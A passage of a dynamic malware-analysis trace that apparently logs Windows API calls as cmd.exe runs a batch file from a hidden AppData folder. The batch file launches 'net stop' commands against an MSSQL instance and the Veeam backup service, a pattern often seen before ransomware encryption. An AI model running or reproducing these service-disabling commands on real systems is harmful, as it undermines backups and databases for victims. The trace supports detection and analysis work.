lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0216.904] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0216.904] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.904] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0216.904] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0216.905] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0216.905] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0216.905] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQL$PRACTTICEBGC /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQL$PRACTTICEBGC /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSSQL$PRACTTICEBGC /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x858, dwThreadId=0x860)) returned 1 [0216.909] CloseHandle (hObject=0x74) returned 1 [0216.909] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0216.909] GetProcessHeap () returned 0x3e0000 [0216.909] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0216.909] GetEnvironmentStringsW () returned 0x3f8408* [0216.909] GetProcessHeap () returned 0x3e0000 [0216.909] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0216.909] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0216.909] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0217.033] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0217.034] CloseHandle (hObject=0x78) returned 1 [0217.034] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0217.034] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0217.034] GetProcessHeap () returned 0x3e0000 [0217.034] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0217.034] GetEnvironmentStringsW () returned 0x3f8408* [0217.034] GetProcessHeap () returned 0x3e0000 [0217.034] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0217.034] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0217.034] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0217.034] GetProcessHeap () returned 0x3e0000 [0217.034] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0217.034] GetEnvironmentStringsW () returned 0x3f8408* [0217.034] GetProcessHeap () returned 0x3e0000 [0217.034] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0217.034] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0217.035] GetProcessHeap () returned 0x3e0000 [0217.035] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0217.035] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0217.035] _get_osfhandle (_FileHandle=1) returned 0x264 [0217.035] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0217.035] _get_osfhandle (_FileHandle=1) returned 0x264 [0217.035] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0217.035] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0217.035] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0217.035] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0217.035] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0217.035] SetConsoleInputExeNameW () returned 0x1 [0217.036] GetConsoleOutputCP () returned 0x1b5 [0217.036] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0217.036] SetThreadUILanguage (LangId=0x0) returned 0x409 [0217.036] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0217.036] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0217.036] _get_osfhandle (_FileHandle=3) returned 0x78 [0217.036] SetFilePointer (in: hFile=0x78, lDistanceToMove=5897, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1709 [0217.036] GetProcessHeap () returned 0x3e0000 [0217.036] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0217.036] GetProcessHeap () returned 0x3e0000 [0217.036] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0217.036] GetProcessHeap () returned 0x3e0000 [0217.036] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0217.036] GetProcessHeap () returned 0x3e0000 [0217.036] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0217.036] GetProcessHeap () returned 0x3e0000 [0217.036] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0217.036] GetProcessHeap () returned 0x3e0000 [0217.036] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0217.036] GetProcessHeap () returned 0x3e0000 [0217.036] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0217.036] GetProcessHeap () returned 0x3e0000 [0217.036] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0217.036] GetProcessHeap () returned 0x3e0000 [0217.036] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0217.036] GetProcessHeap () returned 0x3e0000 [0217.037] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0217.037] GetProcessHeap () returned 0x3e0000 [0217.037] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0217.037] GetProcessHeap () returned 0x3e0000 [0217.037] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0217.037] GetProcessHeap () returned 0x3e0000 [0217.037] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0217.037] _get_osfhandle (_FileHandle=3) returned 0x78 [0217.037] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1709 [0217.037] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x1b8, lpOverlapped=0x0) returned 1 [0217.037] SetFilePointer (in: hFile=0x78, lDistanceToMove=5923, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1723 [0217.037] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=26, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop VeeamRESTSvc /y\r\nC /y\r\ntor /y\r\n /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 26 [0217.037] _get_osfhandle (_FileHandle=3) returned 0x78 [0217.037] GetFileType (hFile=0x78) returned 0x1 [0217.037] _get_osfhandle (_FileHandle=3) returned 0x78 [0217.037] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1723 [0217.037] GetProcessHeap () returned 0x3e0000 [0217.037] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0217.038] GetProcessHeap () returned 0x3e0000 [0217.038] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0217.041] _tell (_FileHandle=3) returned 5923 [0217.041] _close (_FileHandle=3) returned 0 [0217.041] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0217.041] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0217.041] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0217.041] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0217.041] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0217.041] _wcsicmp (_String1="net", _String2="CD") returned 11 [0217.041] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0217.041] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0217.041] _wcsicmp (_String1="net", _String2="REN") returned -4 [0217.041] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0217.041] _wcsicmp (_String1="net", _String2="SET") returned -5 [0217.041] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0217.041] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0217.041] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0217.041] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0217.041] _wcsicmp (_String1="net", _String2="MD") returned 1 [0217.041] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0217.041] _wcsicmp (_String1="net", _String2="RD") returned -4 [0217.041] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0217.041] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0217.042] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0217.042] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0217.042] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0217.042] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0217.042] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0217.042] _wcsicmp (_String1="net", _String2="VER") returned -8 [0217.042] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0217.042] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0217.042] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0217.042] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0217.042] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0217.042] _wcsicmp (_String1="net", _String2="START") returned -5 [0217.042] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0217.042] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0217.042] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0217.042] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0217.042] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0217.042] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0217.042] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0217.042] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0217.042] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0217.042] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0217.042] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0217.042] SetErrorMode (uMode=0x0) returned 0x1 [0217.043] GetProcessHeap () returned 0x3e0000 [0217.043] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0217.043] GetProcessHeap () returned 0x3e0000 [0217.043] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0217.043] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0217.043] GetProcessHeap () returned 0x3e0000 [0217.043] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0217.043] GetProcessHeap () returned 0x3e0000 [0217.043] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0217.043] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0217.044] GetProcessHeap () returned 0x3e0000 [0217.044] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0217.044] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0217.044] GetProcessHeap () returned 0x3e0000 [0217.044] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0217.044] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0217.044] GetProcessHeap () returned 0x3e0000 [0217.044] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0217.044] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0217.045] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0217.045] GetLastError () returned 0x2 [0217.047] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0217.047] GetLastError () returned 0x2 [0217.047] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0217.047] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0217.048] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0217.048] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0217.048] GetLastError () returned 0x2 [0217.048] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0217.048] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0217.049] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.049] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0217.049] SetErrorMode (uMode=0x0) returned 0x1 [0217.049] GetProcessHeap () returned 0x3e0000 [0217.049] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0217.050] GetProcessHeap () returned 0x3e0000 [0217.050] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0217.050] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0217.050] GetProcessHeap () returned 0x3e0000 [0217.050] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0217.050] GetProcessHeap () returned 0x3e0000 [0217.050] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0217.050] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0217.050] GetProcessHeap () returned 0x3e0000 [0217.050] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0217.050] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0217.051] GetProcessHeap () returned 0x3e0000 [0217.051] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0217.051] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0217.051] GetProcessHeap () returned 0x3e0000 [0217.051] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0217.051] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0217.052] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0217.052] GetLastError () returned 0x2 [0217.052] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0217.052] GetLastError () returned 0x2 [0217.053] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0217.053] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0217.053] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0217.054] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0217.054] GetLastError () returned 0x2 [0217.054] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0217.054] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0217.055] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.055] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0217.055] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0217.055] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0217.055] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0217.055] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop VeeamRESTSvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop VeeamRESTSvc /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop VeeamRESTSvc /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x5a8, dwThreadId=0x2b0)) returned 1 [0217.059] CloseHandle (hObject=0x78) returned 1 [0217.059] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0217.059] GetProcessHeap () returned 0x3e0000 [0217.059] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0217.059] GetEnvironmentStringsW () returned 0x3f8408* [0217.059] GetProcessHeap () returned 0x3e0000 [0217.059] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0217.060] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0217.060] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0217.211] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0217.211] CloseHandle (hObject=0x74) returned 1 [0217.211] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0217.211] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0217.211] GetProcessHeap () returned 0x3e0000 [0217.211] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0217.211] GetEnvironmentStringsW () returned 0x3f8408* [0217.211] GetProcessHeap () returned 0x3e0000 [0217.211] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0217.211] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0217.211] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0217.211] GetProcessHeap () returned 0x3e0000 [0217.212] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0217.212] GetEnvironmentStringsW () returned 0x3f8408* [0217.212] GetProcessHeap () returned 0x3e0000 [0217.212] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0217.212] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0217.212] GetProcessHeap () returned 0x3e0000 [0217.212] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0217.212] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0217.212] _get_osfhandle (_FileHandle=1) returned 0x264 [0217.212] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0217.212] _get_osfhandle (_FileHandle=1) returned 0x264 [0217.212] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0217.212] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0217.212] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0217.213] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0217.213] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0217.213] SetConsoleInputExeNameW () returned 0x1 [0217.213] GetConsoleOutputCP () returned 0x1b5 [0217.213] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0217.213] SetThreadUILanguage (LangId=0x0) returned 0x409 [0217.213] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0217.213] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0217.213] _get_osfhandle (_FileHandle=3) returned 0x74 [0217.213] SetFilePointer (in: hFile=0x74, lDistanceToMove=5923, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1723 [0217.214] GetProcessHeap () returned 0x3e0000 [0217.214] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0217.214] GetProcessHeap () returned 0x3e0000 [0217.214] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0217.214] GetProcessHeap () returned 0x3e0000 [0217.214] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0217.214] GetProcessHeap () returned 0x3e0000 [0217.214] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0217.214] GetProcessHeap () returned 0x3e0000 [0217.214] HeapFree (in: 